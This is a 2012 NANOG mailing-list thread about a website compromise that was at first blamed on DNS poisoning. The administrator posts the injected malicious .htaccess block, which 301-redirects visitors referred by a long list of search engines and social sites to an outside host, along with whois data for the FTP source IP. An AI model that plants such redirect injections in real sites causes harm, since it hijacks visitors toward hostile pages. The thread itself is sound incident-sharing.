No DNS poisoning at Google (in case of trouble, blame the DNS)

Matthew Black Matthew.Black at csulb.edu
Wed Jun 27 16:56:31 UTC 2012


By the way, FTP access originated from: 208.88.11.111

Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255

NetRange:       208.88.8.0 - 208.88.11.255
CIDR:           208.88.8.0/22
OriginAS:       AS40603
NetName:        SKYWIRE-SG
NetHandle:      NET-208-88-8-0-1
Parent:         NET-208-0-0-0-0
NetType:        Direct Allocation
Comment:        http://www.skywireusa.com
RegDate:        2008-03-04
Updated:        2012-03-02
Ref:            http://whois.arin.net/rest/net/NET-208-88-8-0-1

OrgName:        Sky Wire Communications
OrgId:          DGSU
Address:        946 W Sunset Blvd Ste L
City:           St George
StateProv:      UT
PostalCode:     84770
Country:        US
RegDate:        2007-12-04
Updated:        2009-11-04
Ref:            http://whois.arin.net/rest/org/DGSU


Who We Are
Skywire Communications is the Leading High Speed Internet Provider in Southern Utah. Offering Service in St George, Washington, Santa Clara, Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to provide high speed internet access to 100 Percent of Southern Utah. We are located in St George, Utah.




matthew black
information technology services
california state university, long beach



-----Original Message-----
From: Matthew Black [mailto:Matthew.Black at csulb.edu] 
Sent: Wednesday, June 27, 2012 9:52 AM
To: 'Jason Hellenthal'; Arturo Servin
Cc: nanog at nanog.org
Subject: RE: No DNS poisoning at Google (in case of trouble, blame the DNS)

Ask and ye shall receive:

# more .htaccess (backup copy)

#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt
avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea
rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d
ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel
and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea
rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|
jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l
ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse
arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea
rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s
uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin
e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|
westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
</IfModule>
#/c3284d#

          # # #

matthew black
information technology services
california state university, long beach



-----Original Message-----
From: Jason Hellenthal [mailto:jhellenthal at dataix.net] 
Sent: Wednesday, June 27, 2012 6:26 AM
To: Arturo Servin
Cc: nanog at nanog.org
Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS)


What would be nice is the to see the contents of the htaccess file
(obviously with sensitive information excluded)

On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
> 
> It was not DNS issue, but it was a clear case on how community-support helped.
> 
> Some of us may even learn some new tricks. :)
> 
> Regards,
> as
> 
> Sent from mobile device. Excuse brevity and typos.
> 
> 
> On 27 Jun 2012, at 05:07, Daniel Rohan <drohan at gmail.com> wrote:
> 
> > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer <bortzmeyer at nic.fr>wrote:
> > 
> > What made you think it can be a DNS cache poisoning (a very rare
> >> event, despite what the media say) when there are many much more
> >> realistic possibilities (<troll>specially for a Web site written in
> >> PHP</troll>)?
> >> 
> >> What was the evidence pointing to a DNS problem?
> >> 
> > 
> > It seems likely that he made a mistake in his analysis of the evidence.
> > Something that could happen to anyone when operating outside of a comfort
> > zone or having a bad day. Go easy.
> > 
> > -DR
> 

-- 

 - (2^(N-1))










More information about the NANOG mailing list